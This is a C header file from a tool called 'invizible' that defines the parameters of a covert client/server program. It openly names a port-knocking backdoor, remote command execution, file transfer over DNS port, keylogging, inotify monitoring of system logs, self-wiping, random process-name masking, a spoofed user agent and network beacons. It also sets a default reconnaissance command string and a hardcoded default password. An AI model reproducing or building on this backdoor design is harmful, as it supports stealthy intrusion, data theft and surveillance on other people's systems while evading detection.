 /**
 * @file parms.h
 * @project invizible
 * @author Wesley Kenzie (wkenzie@gmail.com PGP 4c945266)
 * @created April 20, 2011
 * @modified June 19, 2011
 * @version: 0.109
 * @copyright 2011. Arthur (Wesley) Kenzie. All Rights Reserved.
 * @license 3-clause BSD License. See accompanying LICENSE file.
 */

#ifndef _PARMS_H
#define	_PARMS_H

#ifdef	__cplusplus
extern "C" {
#endif

#include "common.h"
#include "invizible.h"
#include "mypcap.h"
#include "pkcommon.h"
#include "pkclient.h"
#include "pkserver.h"
#include <sys/inotify.h>

#define INVIZ_AUTO_DESC "auto"
#define INVIZ_ANY_DESC "any"
#define INVIZ_RANDOM_DESC "random"
#define INVIZ_FORK_DESC "fork"
#define INVIZ_ECHO_DESC "echo"
#define INVIZ_NONBLOCKING_DESC "nonblocking"
#define INVIZ_ONCE_DESC "once"
#define INVIZ_EXPIRY_DESC "expiry"
#define INVIZ_COUNT_DESC "count"
#define INVIZ_LOG_DESC "log"
#define INVIZ_WATCH_DESC "watch"
#define INVIZ_DNS_DESC "dns"
#define INVIZ_KEY_DESC "key"
#define INVIZ_SEED_DESC "seed"
#define INVIZ_DEFAULT_DESC "default"
#define INVIZ_WIPE_DESC "wipe"
#define INVIZ_REMOVE_DESC "remove"
#define INVIZ_ERASE_DESC "erase"
#define INVIZ_ACCESS_DESC "access"
#define INVIZ_COMMAND_DESC "command"
#define INVIZ_INOTIFY_DESC "inotify"
#define INVIZ_TRANSFER_DESC "transfer"
#define INVIZ_BEACON_DESC "beacon"
#define INVIZ_PRIVATE_DESC "private"
#define INVIZ_PUBLIC_DESC "public"
#define INVIZ_KEYLOG_DESC "keylog"
#define INVIZ_SELF_DESC "self"
#define INVIZ_PASSWORD_DESC "pwd"
#define INVIZ_PASSWORD_DESC_ALT1 "password"
#define INVIZ_PASSWORD_DESC_ALT2 "pass"
#define INVIZ_LISTENER_DESC "server"
#define INVIZ_SENDER_DESC "client"
#define INVIZ_INTERACTIVE_DESC "interactive"
#define INVIZ_SEPARATORS " ,;"
#define INVIZ_DEFAULT_DNS_IP4 "208.67.222.222" // opendns
#define INVIZ_DEFAULT_DNS_IP6 "2001:470:20::2"; // hurricane electric
#define INVIZ_DEFAULT_KEYSEED "ns5"
#define INVIZ_DEFAULT_SEED 0
#define INVIZ_DEFAULT_PSMASK INVIZ_RANDOM_DESC
#define INVIZ_DEFAULT_LOG_FILENAME "/var/log/invizible.log"
#define INVIZ_SOCKET_RECV_BUFFER_SIZE "4194304"
#define INVIZ_MAX_SEED 255 // must be <= number of different domains to be looked up
#define INVIZ_MIN_SEED 0
#define INVIZ_MAX_SEED_LEN 3 // to match length of INVIZ_MAX_SEED
#define INVIZ_MAX_KEYSEED_LEN 32 // max seed "key" length
#define INVIZ_MAX_PSMASK_LEN 16 // max process "masked" name length
#define INVIZ_MIN_PSMASK_LEN 2
#define INVIZ_MIN_PSMASK_RANDOM 5 // do not mask to first 5 processes
#define INVIZ_MAX_PSMASK_RANDOM 255
#define INVIZ_PSMASK_TIMER 0 // seconds for randomizing ps mask (0 for not)
#define INVIZ_DNS_PORT 53
#define INVIZ_HTTP_PORT 80
#define INVIZ_MAX_PKPORT MAX_UNPRIVILEGED_PORT
#define INVIZ_MIN_PKPORT 1
#define INVIZ_MAX_PKPORT_LEN 16 // for use with --pkport= parameter
#define INVIZ_MAX_SLEEP_SECONDS 3600 // max of 1 hour between sent packets
#define INVIZ_MIN_SLEEP_SECONDS 3 // minimum second(s) between sent packets
#define INVIZ_DEFAULT_SLEEP_SECONDS 12 // default random between min and this between packets
#define INVIZ_DEFAULT_CONFIRM 0 // default do not confirm sent packets
#define INVIZ_DEFAULT_DUPLICATE_PAUSE 3 // seconds between duplicates
#define INVIZ_MAX_CONFIRM_EXPIRY 3600 // seconds
#define INVIZ_MIN_CONFIRM_EXPIRY 1 // seconds
#define INVIZ_DEFAULT_CONFIRM_EXPIRY INVIZ_MAX_CONFIRM_EXPIRY // abort if confirmation not received in 1 hour
#define INVIZ_MODE_LISTENER 8 // also called "server"
#define INVIZ_MODE_SENDER 9 // also called "client"
#define INVIZ_MODE_SENDER_LISTENING 7 // client in listening mode
#define INVIZ_DEFAULT_IFNAME INVIZ_ANY_DESC
#define INVIZ_DEFAULT_PKPORT INVIZ_RANDOM_DESC // default port knocking backdoor port number
#define INVIZ_DEFAULT_PKPORT_FIRST 10000
#define INVIZ_DEFAULT_PKPORT_LAST MAX_UNPRIVILEGED_PORT
#define INVIZ_DEFAULT_PKACCESS_PORT "22" // open remote access to this port
#define INVIZ_DEFAULT_SRCPORT 0 // default client source port (0 is unspecified)
#define INVIZ_DEFAULT_PKALLOW_IP INVIZ_ANY_DESC // for incoming packets to server
#define INVIZ_MAX_SRCPORT MAX_UNPRIVILEGED_PORT
#define INVIZ_MIN_SRCPORT 0 // or MAX_PRIVILEGED_PORT + 1 ?
#define INVIZ_PKTYPE_DISABLED 0 // default port knocking type (disabled)
#define INVIZ_PKTYPE_ACCESS INVIZ_PKTYPE_DISABLED+1 // send access request from client
#define INVIZ_PKTYPE_COMMAND INVIZ_PKTYPE_ACCESS+1 // send command to server to be executed
#define INVIZ_PKTYPE_TRANSFER INVIZ_PKTYPE_COMMAND+1 // send file transfer request from client
#define INVIZ_PKTYPE_INOTIFY INVIZ_PKTYPE_TRANSFER+1 // send inotify command to server
#define INVIZ_PKTYPE_KEYLOG INVIZ_PKTYPE_INOTIFY+1 // send key logging command to server
#define INVIZ_PKTYPE_WIPE INVIZ_PKTYPE_KEYLOG+1 // send wipe command to server
#define INVIZ_PKTYPE_PASS INVIZ_PKTYPE_WIPE+1 // send password command to server
#define INVIZ_PKTYPE_BEACON INVIZ_PKTYPE_PASS+1 // send out beacon to clients/senders
#define INVIZ_PKTYPE_ANY INVIZ_PKTYPE_BEACON+1 // for server only - to receive anything
#define INVIZ_DEFAULT_PKTIMEOUT 15 // default port knocking timeout (for client)
#define INVIZ_MAX_PKTIMEOUT 3600 // max port knocking timeout (seconds)
#define INVIZ_MIN_PKTIMEOUT 1 // min port knocking timeout (seconds)
#define INVIZ_MAX_PKCOMMAND_LEN 511 // max port knocking command string length
#define INVIZ_MAX_PKACCESS_LEN 511 // max port knocking access string length
#define INVIZ_MAX_PKBEACON_LEN 255 // max port knocking beacon message length
#define INVIZ_MIN_PKDATA_LEN MIN_SPA_DATA_SIZE
#define INVIZ_MAX_PKDATA_LEN MAX_SPA_MESSAGE_SIZE // really this?
    // why is there both a *_PKDATA_LEN and *_PKENCODED_LEN ?
#define INVIZ_MIN_PKENCODED_LEN MIN_SPA_ENCODED_MSG_SIZE
#define INVIZ_MAX_PKENCODED_LEN 1024 // arbitrary at this point
#define INVIZ_DEFAULT_PKCOMMAND_LOG "/tmp/m.log"
#define INVIZ_DEFAULT_PKCOMMAND "date > "INVIZ_DEFAULT_PKCOMMAND_LOG"; " \
    "uname -a >> "INVIZ_DEFAULT_PKCOMMAND_LOG"; " \
    "lsof -nP | grep LISTEN >> "INVIZ_DEFAULT_PKCOMMAND_LOG" 2>&1; " \
    "cat /proc/net/arp >> "INVIZ_DEFAULT_PKCOMMAND_LOG"; " \
    "cat /proc/net/route >> "INVIZ_DEFAULT_PKCOMMAND_LOG"; " \
    "ifconfig >> "INVIZ_DEFAULT_PKCOMMAND_LOG"; " \
    "df -T >> "INVIZ_DEFAULT_PKCOMMAND_LOG
#define INVIZ_DEFAULT_PKINOTIFY_SERVER_LOG "/tmp/i.log" // on server
#define INVIZ_DEFAULT_PKINOTIFY_CLIENT_LOG_COPY "inotify.log" // local on client
#define INVIZ_DEFAULT_PKINOTIFY_TARGET "/var/log" // no trailing slash
#define INVIZ_DEFAULT_PKINOTIFY INVIZ_WATCH_DESC"="INVIZ_DEFAULT_PKINOTIFY_TARGET","INVIZ_LOG_DESC"="INVIZ_DEFAULT_PKINOTIFY_SERVER_LOG
#define INVIZ_DEFAULT_PKINOTIFY_EVENTS IN_ALL_EVENTS
#define INVIZ_DEFAULT_PKINOTIFY_FORK FALSE
#define INVIZ_DEFAULT_PKINOTIFY_ONCE FALSE
#define INVIZ_DEFAULT_PKINOTIFY_NONBLOCKING FALSE
#define INVIZ_DEFAULT_PKINOTIFY_ECHO FALSE
#define INVIZ_DEFAULT_PKTRANSFER_ECHO FALSE
#define INVIZ_DEFAULT_PKTRANSFER_WIPE FALSE
#define INVIZ_DEFAULT_PKTRANSFER_REMOVE FALSE
#define INVIZ_DEFAULT_PKTRANSFER_ERASE INVIZ_DEFAULT_PKTRANSFER_REMOVE
#define INVIZ_DEFAULT_PKTRANSFER_BUFFER_LEN 128
#define INVIZ_DEFAULT_PKBEACON_BUFFER_LEN 128
#define INVIZ_DEFAULT_PKBEACON_MAX_INTERVAL 3600 // one hour
#define INVIZ_DEFAULT_PKBEACON_MIN_INTERVAL 60 // one minute
#define INVIZ_MAX_PKBEACON_INTERVAL 3600*24 // one day
#define INVIZ_MIN_PKBEACON_INTERVAL 60 // one minute
#define INVIZ_DEFAULT_PKBEACON_MSG "elbizivni"
#define INVIZ_DEFAULT_PKBEACON_DEST_PORT_TCP INVIZ_HTTP_PORT
#define INVIZ_DEFAULT_PKBEACON_DEST_PORT_UDP INVIZ_DNS_PORT
#define INVIZ_DEFAULT_PKBEACON_PROTOCOL IPPROTO_UDP_DESC
#define INVIZ_DEFAULT_PKTRANSFER_SRC_PORT 0 // random
#define INVIZ_DEFAULT_PKTRANSFER_DEST_PORT INVIZ_DNS_PORT
#define INVIZ_DEFAULT_PKINOTIFY_MAX_TIME 3600 // seconds (0=indefinite)
#define INVIZ_DEFAULT_PKINOTIFY_MAX_COUNT 100 // 0=indefinite number of events
#define INVIZ_DEFAULT_PKACCESS_PROTOCOL IPPROTO_TCP_DESC
#define INVIZ_DEFAULT_PKACCESS INVIZ_DEFAULT_PKACCESS_PROTOCOL"/"INVIZ_DEFAULT_PKACCESS_PORT
#define INVIZ_DEFAULT_PKWIPE INVIZ_SELF_DESC"/"DOD_WIPE_FILE_TIMES_STRING
#define INVIZ_DEFAULT_PKPASS INVIZ_INTERACTIVE_DESC
#define INVIZ_DEFAULT_PKBEACON "/24" // to all public and private IP addresses /24
#define INVIZ_DEFAULT_PKBEACON_PUBLIC INVIZ_DEFAULT_PKBEACON
#define INVIZ_DEFAULT_PKBEACON_PRIVATE INVIZ_DEFAULT_PKBEACON
#define INVIZ_DEFAULT_NATACCESS "" // default nat access request
#define INVIZ_DEFAULT_RECEIVE_FILE "/tmp/received"
#define INVIZ_MAX_GPGKEY_LEN MAX_GPG_KEY_ID
#define INVIZ_MAX_PATH_LEN MAX_PATH_LEN
#define INVIZ_DEFAULT_PROXY_TYPE "http"
#define INVIZ_MAX_PROXYTYPE_LEN 16
#define INVIZ_MAX_UA_LEN HTTP_MAX_USER_AGENT_LEN
#define INVIZ_DEFAULT_UA "invizible/"INVIZ_VERSION
#define INVIZ_DEFAULT_SPOOFED_UA "DirectUpdate/4.6.2"
#define INVIZ_MAX_PW_LEN 128
#define INVIZ_MAX_PROTOCOL_LEN 5
#define INVIZ_MAX_COMMANDLINE_LEN 2048
#define INVIZ_MAX_PCAP_DEVICE_LEN 16
#define INVIZ_DEFAULT_PCAP_BUFSIZ 1500
#define INVIZ_MAX_PCAP_BUFSIZ 10240
#define INVIZ_MIN_PCAP_BUFSIZ 1
#define INVIZ_DEFAULT_PCAP_TIMEOUT -1
#define INVIZ_MAX_PCAP_TIMEOUT 86400
#define INVIZ_MIN_PCAP_TIMEOUT -1
#define INVIZ_DEFAULT_SPA_CONFIG_FILENAME "/usr/local/etc/fwknopd/fwknopd.conf"
#define INVIZ_DEFAULT_SPA_ACCESS_FILENAME "/usr/local/etc/fwknopd/access.conf"
#define INVIZ_DEFAULT_FIREWALL_EXE "/sbin/iptables"
#define INVIZ_DEFAULT_PACKET_LIMIT 0 // currently no limits set
#define INVIZ_DEFAULT_TCPSERVER_PORT 62001
#define INVIZ_MAX_PASSWORD_LEN 64 // arbitrary
#define INVIZ_DEFAULT_PASSWORD "mill44_A##t79D00A+"
#define INVIZ_DEFAULT_PKDIGEST FKO_DIGEST_SHA256
#define INVIZ_PREVIOUS_TRANS_IDS 20 // last 20 packet transaction ID's
#define INVIZ_EOF_CHAR 255
//
// following pktypes are used to define 8 possible states of port knocking
//
enum pktypes {
    PKTYPE0=INVIZ_PKTYPE_DISABLED,
    PKTYPE1=INVIZ_PKTYPE_ACCESS,
    PKTYPE2=INVIZ_PKTYPE_COMMAND,
    PKTYPE3=INVIZ_PKTYPE_TRANSFER,
    PKTYPE4=INVIZ_PKTYPE_INOTIFY,
    PKTYPE5=INVIZ_PKTYPE_KEYLOG,
    PKTYPE6=INVIZ_PKTYPE_WIPE,
    PKTYPE7=INVIZ_PKTYPE_PASS,
    PKTYPE8=INVIZ_PKTYPE_BEACON,
    PKTYPE9=INVIZ_PKTYPE_ANY
};

#define INVIZ_DEFAULT_PKTYPE INVIZ_PKTYPE_ANY
    //
    // program start-up parameters
    //
    struct parms_st {
        int iverbose;
        int btesting;
        int bip6;
        int bip4;
        int btcp;
        int braw;
        int budp;
        int bicmp;
        int btransid; // use udp trans id to send file transfer contents
        int blogfile;
        char * logfilename;
        int bsigchld; // set sigchld signal handler?
        int bproxy; // using proxy?
        int bip; // using ip protocol?
        int bsctp; // using sctp protocol?
        int bgpg; // using gpg?
        int bgpg_agent; // using gpg-agent?
        int bpromiscuous; // doing pcap sniffing in promiscuous?
        int bfkopcap; // using fwknopd pcap code?
        int imode;
        int iduplicates; // how many duplicates to send?
        int iduplicateinterval; // seconds between duplicates
        int datalinkoffset; // determined by pcap_datalink()
        int bpkaccessfile; // use pk access file (server only)
        int btcpserver; // using tcp server (server only)
        int tcpserverport; // port to run tcp server on (server only)
        int tcpserverpid; // server only (listening for pk incoming packets)
        int pidfd; // pid file descriptor
        int inotifyfd; // inotify file descriptor
        int inotifywd; // inotify watch descriptor
        int inotifyevents; // inotify events so far (count up)
        int sockraw; // raw socket fd
        fko_ctx_t fko_ctx; // port knocking context
        double inotifywatchdog; // watchdog timer (snapshot)
        char * inotifytarget; // inotify watch target
        char * beacontarget;
        char * pkbeaconprivate; // send beacons to private IP addresses?
        char * pkbeaconpublic; // send beacons to public IP addresses?
        char * pkbeaconcurrentprivatedest;
        char * pkbeaconcurrentpublicdest;
        int * bpkbeacontcp;
        int * bpkbeaconudp;
        char * pkbeaconmsg;
        int pkbeaconmininterval;
        int pkbeaconmaxinterval;
        uint pkbeacontcpdestport;
        uint pkbeaconudpdestport;
        char * transfertarget;
        char * inotifyoptions; // inotify watch options
        char * transferoptions;
        char * beaconoptions;
        int pkbeacon; // port knocking beacons enabled?
        char * uname; // uname -a from running environment
        char * inotifylog; // inotify log file name
        char * pkclient; // port knocking client IP address
        char * inotifyechodns; // inotify echo dns bounce server IP address
        char * inotifyechokey; // inotify echo key/seed
        int inotifyechoseed; // inotify echo seed (0-255)
        char * wipetarget; // wipe target/file name
        char * protocoldesc;
        char * server_ip4;
        char * server_ip6;
        char * server_ip; // one of server_ip4 or server_ip6
        char * server_hostname;
        char * dns_ip4;
        char * dns_ip6;
        char * dns_ip; // one of dns_ip4 or dns_ip6
        char * dns_hostname;
        char * client_ip4;
        char * client_ip6;
        char * client_ip; // one of client_ip4 or client_ip6
        char * client_hostname;
        char * external_ip4; // public ip4 of self (client or server)
        char * external_ip6; // public ip6 of self (client or server)
        char * external_ip; // one of external_ip4 or external_ip6
        char * external_hostname;
        char * spoof_ip4;
        char * spoof_ip6;
        char * spoof_ip; // one of spoof_ip4 or spoof_ip6
        char * spoof_hostname;
        char * filename;
        char * pksavefilename; // filename to save port knocking packets into
        char * pkaccessfilename; // port knocking access filename (server only)
        char * pkconfigfilename; // port knocking config filename (server only)
        char * firewallexe; // executable firewall program name
        char * ifname; // interface (like "eth0")
        char * ifnameip; // IP assigned to ifname interface
        char * packetfilter; // used by libpcap
        char * proxy; // ip address
        char * proxytype; // http? socks?
        char * useragent;
        char * destination_ip;
        char * source_ip;
        char * snat_translate_ip;
        char * pcap_device;
        char * pkpassword;
        pcap_t * pcap_struct;
        struct fw_chain * firewall_chain;
        struct fw_config * firewall_config;
        struct spa_pkt_info * spa_packet_struct; // single packet authentication
        struct acc_stanza * acc_stanza_struct; // access stanzas ?
        char * firewall_access[NUM_IPT_ACCESS];
        int binteractive; // allow interactive password on listener?
        int bspaoverhttp; // allow spa over http?
        int bfwoutput; // allow firewall output?
        int bfwforwarding; // allow firewall forwarding?
        int bfwsnat; // allow firewall snat?
        int pcap_bufsize;
        int pcap_timeout; // seconds (-1 is no timeout)
        long lfilesize; // really just a placeholder, not a parameter
        long lfiledone; // also just a placeholder
        int bstarted; // file transfer started placeholder
        int bfinished; // file transfer finished placeholder
        int breplace; // replace existing file (on server)
        int bappend; // add to existing file (on server)
        int bremove; // delete file after sending (on client)
        int bwipeprogram; // delete program after startup
        int iwipetimes; // how many times to "wipe"
        int iseed; // integer "seed" must match on both client + server
        int irotatingseed; // rotating seed value between min and max
        int ifirsttid; // first transaction ID
        int iprevtid; // previous transaction ID
        int iprevtids[INVIZ_PREVIOUS_TRANS_IDS];
        int ipackets; // count of packets received
        int ipacketlimit; // specified limit of packets to be received
        int ipacketstodo; // estimated packets to be sent
        char * keyseed; // character key "seed" must match on both client + server
        char * triggerhostname;
        char * psmask; // process "mask" name
        int brandomizeps; // randomize process mask name
        double irandomizetimer;
        char * originalpsname;
        char * programname;
        char * devrandom;
        int isleepmax;
        int isleepmin;
        int iseedconstant;
        int iseedoverflow;
        int irecvpacketlen; // size of recv buffer before writing to disk
        int brecvpacketset; // has recv buffer len been specified?
        int iconfirminterval; // how often confirmation is sent back from server
        int iconfirmexpiry; // how long to wait for confirmation before aborting
        int iwatchdog; // counter to next interval
        int srcport; // specified client source port
        uint packetsrcport; // packet source port
        uint packetdestport; // packet destination port
        uint pktransfersrcport; // pk transfer source port
        uint pktransferdestport; // pk transfer destination port
        int pkport; // port knocker backdoor
        int pkportrandom; // use random backdoor port numbers?
        int pkportfirst; // start of backdoor port number range
        int pkportlast; // end of backdoor port number range
        int pktype; // port knocker type to use (on both client + server)
        int pktimeout; // port knocker timeout seconds (client only)
        short pkdigest; // digest/hash type to use for port knocking packet
        int pkprivate; // port knocking on private subnet?
        int pkmindatalen;
        int pkmaxdatalen;
        int pkminencodedlen;
        int pkmaxencodedlen;
        char * pkservercommand; // port knocker server command to be executed
        char * pktransfercommand; // port knocker filename to be transferred
        char * pkinotifycommand; // port knocker inotify command
        char * pkkeylogcommand; // port knocker key logging command
        char * pkwipecommand; // port knocker wipe command
        char * pkpasscommand; // port knocking password command
        char * pkbeaconcommand; // port knocking beacon command
        char * pkallow_ip4;
        char * pkallow_ip6;
        char * pkallow_ip; // tell server to give access to this IP address
        char * pkallow_hostname;
        char * pkaccessrequest; // port knocking server access request to be sent from client
        char * nataccessrequest; // nat access request
        int bnatlocal; // is nat local?
        int bportknocking; // using port knocking (on both client + server)
        int brandomizecase; // for libevent2/eventdns.c global_randomize_case
        char * gpg_signerkey;
        char * gpg_recipientkey;
        char * gpg_homedir;
        char * gpg_keyfile;
        FILE * pFile; // file handle
    };
    //
    // function prototype(s)
    //
    int init_parms();
    void cleanup_parms();
    int valparms(int, char**);
    int get_verbose();
    char * get_verboseparm();
    char * get_quietparm();
    int get_duplicates();
    int get_iduplicateinterval();
    int get_testing();
    int get_promiscuous();
    int get_uselogfile();
    void set_uselogfile(int);
    char * get_logfilename();
    char * get_uselogfileparm();
    char * get_nologfileparm();
    void set_logfilename(char *, int);
    void set_verbose(int);
    void set_duplicates(int);
    void set_testing(int);
    int get_usefkopcap();
    void set_usefkopcap(int);
    void set_promiscuous(int);
    int get_useip6();
    int get_useip4();
    int get_setsignalchild();
    char * get_ip4parm();
    char * get_pktypeparm();
    char * get_pcapdevice();
    char * get_firewallexe();
    char * get_pkpassword();
    char * get_pkpasswordparm();
    pcap_t * get_pcapstruct();
    struct fw_chain * get_firewallchain();
    struct fw_config * get_firewallconfig();
    struct spa_pkt_info * get_spapacketstruct();
    char * get_firewallaccess(int);
    char * get_spapacketdata();
    char * get_fwsnatip();
    unsigned int get_spapacketdatalen();
    unsigned int get_spapacketsourceip();
    unsigned short get_spapacketdestinationport();
    struct acc_stanza * get_accstanzastruct();
    int get_allowspaoverhttp();
    char * get_allowspaoverhttpparm();
    int get_fwallowoutput();
    int get_fwallowforwarding();
    int get_fwallowsnat();
    int get_useudp();
    int get_usetcp();
    int get_useraw();
    int get_useicmp();
    int get_useproxy();
    int get_usetcpserver();
    int get_usepkaccessfile();
    int get_usetransid();
    void set_usetransid(int);
    int get_interactive();
    void set_interactive(int);
    int get_tcpserverport();
    int get_mintcpserverport();
    int get_maxtcpserverport();
    int get_useip();
    int get_usesctp();
    int get_iseedconstant();
    void set_iseedconstant(int);
    int get_iseedoverflow();
    void set_iseedoverflow(int);
    int get_firsttid();
    int get_prevtid();
    void set_firsttid(int);
    void set_prevtid(int);
    int is_prevtid(int);
    uint8_t get_usedprotocol(); // which protocol is enabled?
    char * get_usedprotocoldesc(uint8_t); // get description of enabled protocol
    char * get_protocoldesc();
    uint8_t get_protocolnumber(char *, int);
    void set_allprotocolsdisabled();
    int get_usegpg();
    int get_usegpg_agent();
    int get_tcpserverpid();
    char * get_gpg_recipientkey();
    char * get_gpg_signerkey();
    char * get_gpg_homedir();
    char * get_gpg_keyfile();
    int get_mode();
    int get_replace();
    int get_append();
    int get_remove();
    int get_wipeprogram();
    int get_iwipetimes();
    int get_randomizecase();
    int get_iseed();
    int get_irotatingseed();
    int get_ipackets();
    int get_ipacketlimit();
    int get_ipacketstodo();
    int get_iconfirminterval();
    int get_iconfirmexpiry();
    int get_maxconfirmexpiry();
    int get_minconfirmexpiry();
    int get_iwatchdog();
    int get_recvbufferlen();
    int get_pcapbufferlen();
    int get_recvbufferset();
    int get_minrecvbufferlen();
    int get_minpcapbufferlen();
    int get_maxrecvbufferlen();
    int get_maxpcapbufferlen();
    int get_pcaptimeout();
    int get_minpcaptimeout();
    int get_maxpcaptimeout();
    int get_datalinkoffset();
    char * get_keyseed();
    char * get_psmask();
    int get_randomizepsmask();
    double get_randomizepstimer();
    char * get_originalpsname();
    char * get_programname();
    char * get_devrandom();
    void get_randompsmask(char m[INVIZ_MAX_PSMASK_LEN]);
    void set_randompsmask();
    int get_randompsmin();
    int get_randompsmax();
    int get_miniseed();
    int get_maxiseed();
    int get_sleepmax();
    int get_minsleepmax();
    int get_maxsleepmax();
    int get_pidfd();
    int get_inotifyfd();
    int get_inotifywd();
    int get_inotifycount(); // from inotify options
    int get_inotifyevents();
    int get_inotifyexpiry(); // from inotify options
    double get_inotifywatchdog();
    char * get_inotifytarget(); // from inotify options
    int get_pkbeacon(); // pk beacons sent out?
    void set_pkbeacon(int);
    char * get_pkbeacontarget();
    int get_pkbeaconmininterval();
    int get_pkbeaconmaxinterval();
    void set_pkbeaconmininterval(int);
    void set_pkbeaconmaxinterval(int);
    char * get_pkbeaconmsg();
    void set_pkbeaconmsg(char *, int);
    char * get_pkbeaconnextprivatedest();
    char * get_pkbeaconnextpublicdest();
    char * get_pkbeaconcurrentprivatedest();
    void set_pkbeaconcurrentprivatedest(char *, int);
    void set_pkbeaconcurrentpublicdest(char *, int);
    char * get_pkbeaconcurrentprivatedest();
    char * get_pkbeaconcurrentpublicdest();
    char * get_pkbeaconprivate();
    char * get_pkbeaconpublic();
    char * get_pkbeaconpublicparm();
    char * get_pkbeaconprivateparm();
    void set_pkbeaconprivate(char *, int);
    void set_pkbeaconpublic(char *, int);
    char * get_transfertarget();
    char * get_inotifyoptions();
    char * get_transferoptions();
    char * get_inotifylog(); // from inotify options
    char * get_pkclient(); // from pk message
    char * get_inotifyechodns(); // from inotify options
    char * get_inotifyechokey(); // from inotify options
    int get_inotifyechoseed(); // from inotify options
    int get_inotifyfork(); // from inotify options
    int get_inotifyecho(); // from inotify options
    int get_transferecho(); // from transfer options
    int get_transferwipe(); // from transfer options
    int get_transferremove(); // from transfer options
    int get_transfererase(); // equivalenet to remove
    int get_inotifyonce(); // from inotify options
    int get_inotifynonblocking(); // from inotify options
    char * get_wipetarget();
    void set_wipetarget(char *, int);
    char * get_serverip4();
    char * get_serverip6();
    char * get_serverip();
    char * get_serverhostname();
    char * get_dnsip4();
    char * get_dnsip6();
    char * get_dnsip();
    char * get_dnshostname();
    char * get_clientip4();
    char * get_clientip6();
    char * get_clientip();
    char * get_clienthostname();
    char * get_externalip4();
    char * get_externalip6();
    char * get_externalip();
    char * get_externalhostname();
    char * get_externalipparm();
    char * get_spoofip4();
    char * get_spoofip6();
    char * get_spoofip();
    char * get_spoofhostname();
    char * get_spoofipparm();
    char * get_destinationip();
    char * get_sourceip();
    char * get_filename();
    char * get_pksavefilename();
    char * get_pkaccessfilename();
    char * get_pkconfigfilename();
    char * get_proxy();
    char * get_proxytype();
    char * get_useragent();
    int get_usehttpproxy();
    int get_usesocksproxy();
    char * get_ifname();
    char * get_ifnameip();
    char * get_ifnameparm();
    int get_minifnamelen();
    int get_maxifnamelen();
    char * get_packetfilter();
    char * get_triggerhostname();
    long get_filesize();
    long get_filedone();
    int get_started();
    int get_finished();
    int get_pkport();
    int get_pkportfirst();
    int get_pkportlast();
    int get_pkportrandom();
    int get_srcport();
    uint get_packetdestport();
    uint get_packetsrcport();
    int get_pkminport();
    int get_pkmaxport();
    int get_pkmindatalen();
    int get_pkmaxdatalen();
    int get_pkminencodedlen();
    int get_pkmaxencodedlen();
    int get_minsrcport();
    int get_maxsrcport();
    int get_pktype();
    short get_pkdigest();
    char * get_pkdigestparm();
    char * get_pkdigestdesc(short);
    int get_usepk();
    int get_pktimeout();
    int get_minpktimeout();
    int get_maxpktimeout();
    char * get_pktimeoutparm();
    int get_pkprivatesubnet();
    char * get_pkprivateparm();
    char * get_pknotprivateparm();
    char * get_pkservercommand();
    char * get_pkinotifycommand();
    char * get_pkinotifyparm();
    char * get_pkwipecommand();
    char * get_pkwipeparm();
    char * get_pkkeylogcommand();
    char * get_pkkeylogparm();
    char * get_pkpasscommand();
    char * get_pkpassparm();
    char * get_pktransfercommand();
    char * get_pktransferparm();
    char * get_pkbeaconcommand();
    char * get_pkbeaconparm();
    uint get_pktransferdestport();
    uint get_pktransfersrcport();
    char * get_pkaccessrequest();
    char * get_pkaccessrequestparm();
    char * get_pkallowip4();
    char * get_pkallowip6();
    char * get_pkallowip();
    char * get_pkallowipparm();
    char * get_pkallowhostname();
    char * get_nataccessrequest();
    char * get_noopparm();
    int get_natlocal();
    void set_pkport(int);
    void set_pkportfirst(int);
    void set_pkportlast(int);
    void set_pkportrandom(int);
    void set_srcport(int);
    void set_packetdestport(uint);
    void set_packetsrcport(uint);
    void set_pktype(int);
    void set_pkmindatalen(int);
    void set_pkmaxdatalen(int);
    void set_pkminencodedlen(int);
    void set_pkmaxencodedlen(int);
    void set_pkdigest(short);
    void set_usepk(int);
    void set_pkprivatesubnet(int);
    void set_pktimeout(int);
    void set_pkservercommand(char *, int);
    void set_pktransfercommand(char *, int);
    void set_pktransferdestport(uint);
    void set_pktransfersrcport(uint);
    void set_pkinotifycommand(char *, int);
    void set_pkbeaconcommand(char *, int);
    void set_pkpasscommand(char *, int);
    void set_pkwipecommand(char *, int);
    void set_pkkeylogcommand(char *, int);
    void set_pkaccessrequest(char *, int);
    void set_pkaccessprotocol(char *, int);
    void set_pkallowip4(char *, int);
    void set_pkallowip6(char *, int);
    void set_pkallowip(char *, int);
    void set_nataccessrequest(char *, int);
    void set_pkpassword(char *, int);
    void set_firewallexe(char *, int);
    void set_firewallaccess(int, char *, int);
    void set_natlocal(int);
    void set_useip6(int);
    void set_useip4(int);
    void set_usetcp(int);
    void set_useraw(int);
    void set_useudp(int);
    void set_useicmp(int);
    void set_useip(int);
    void set_usesctp(int);
    void set_useproxy(int);
    void set_setsignalchild(int);
    void set_usetcpserver(int);
    void set_usepkaccessfile(int);
    void set_tcpserverport(int);
    void set_allowspaoverhttp(int);
    void set_fwallowoutput(int);
    void set_fwallowforwarding(int);
    void set_fwallowsnat(int);
    void set_usegpg(int);
    void set_tcpserverpid(int);
    void set_usegpg_agent(int);
    void set_protocoldesc(char *, int);
    void set_gpg_recipientkey(char *, int);
    void set_gpg_signerkey(char *, int);
    void set_gpg_homedir(char *, int);
    void set_gpg_keyfile(char *, int);
    void set_fwsnatip(char *, int);
    void set_mode(int);
    void set_datalinkoffset(int);
    void set_randomizecase(int);
    void set_filename(char *, int);
    void set_pksavefilename(char *, int);
    void set_pkaccessfilename(char *, int);
    void set_pkconfigfilename(char *, int);
    void set_proxy(char *, int);
    void set_proxytype(char *, int);
    void set_ifname(char *, int);
    void set_ifnameip(char *, int);
    void set_packetfilter(char *, int);
    void set_triggerhostname(char[NI_MAXHOST], char[NI_MAXHOST], char[16]);
    void set_filesize(long);
    void set_filedone(long);
    void set_filedonemore(long);
    void set_serverip4(char *, int);
    void set_serverip6(char *, int);
    void set_serverip(char *, int);
    void set_serverhostname(char *, int);
    void set_dnsip4(char *, int);
    void set_dnsip6(char *, int);
    void set_dnsip(char *, int);
    void set_dnshostname(char *, int);
    void set_clientip4(char *, int);
    void set_clientip6(char *, int);
    void set_clientip(char *, int);
    void set_clienthostname(char *, int);
    void set_externalip4(char *, int);
    void set_externalip6(char *, int);
    void set_externalip(char *, int);
    void set_externalhostname(char *, int);
    void set_spoofip4(char *, int);
    void set_spoofip6(char *, int);
    void set_spoofip(char *, int);
    void set_spoofhostname(char *, int);
    void set_destinationip(char *, int);
    void set_sourceip(char *, int);
    void set_pcapdevice(char *, int);
    void set_pcapstruct(pcap_t *);
    void set_firewallchain(struct fw_chain *);
